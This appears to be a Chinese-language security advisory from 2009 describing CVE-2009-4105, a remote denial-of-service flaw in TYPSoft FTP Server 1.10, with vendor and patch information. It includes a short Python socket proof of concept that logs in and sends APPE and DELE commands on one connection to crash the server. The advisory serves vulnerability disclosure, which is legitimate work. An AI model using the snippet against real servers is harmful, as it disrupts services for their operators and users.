TYPSoft FTP Server APPE和DELE命令远程拒绝服务漏洞
发布日期:2009-11-24
更新日期:2009-11-25
受影响系统:TYPSoft TYPSoft FTP Server 1.10
描述:
BUGTRAQ ID:
37114
CVE(CAN) ID:
CVE-2009-4105
TYPSoft FTP Server是一款简单易用的FTP服务程序。
TYPSoft FTP Server中存在拒绝服务漏洞,用户登录到服务器后对同一个套接字连接同时使用APPE和DELE命令就会导致服务器崩溃:
1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.sock.send("PORT 127,0,0,1,122,107\r\n")
5.sock.send("APPE "+ test_string +"\r\n")
6.sock.send("DELE "+ test_string +"\r\n")
7.sock.close()
<*来源:leinakesi (
leinakesi@gmail.com)
链接:
http://marc.info/?l=bugtraq&m=125907701814670&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://marc.info/?l=bugtraq&m=125907701814670&w=2建议:
厂商补丁:
TYPSoft
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://en.typsoft.com/浏览次数:2278
严重程度:0(网友投票)
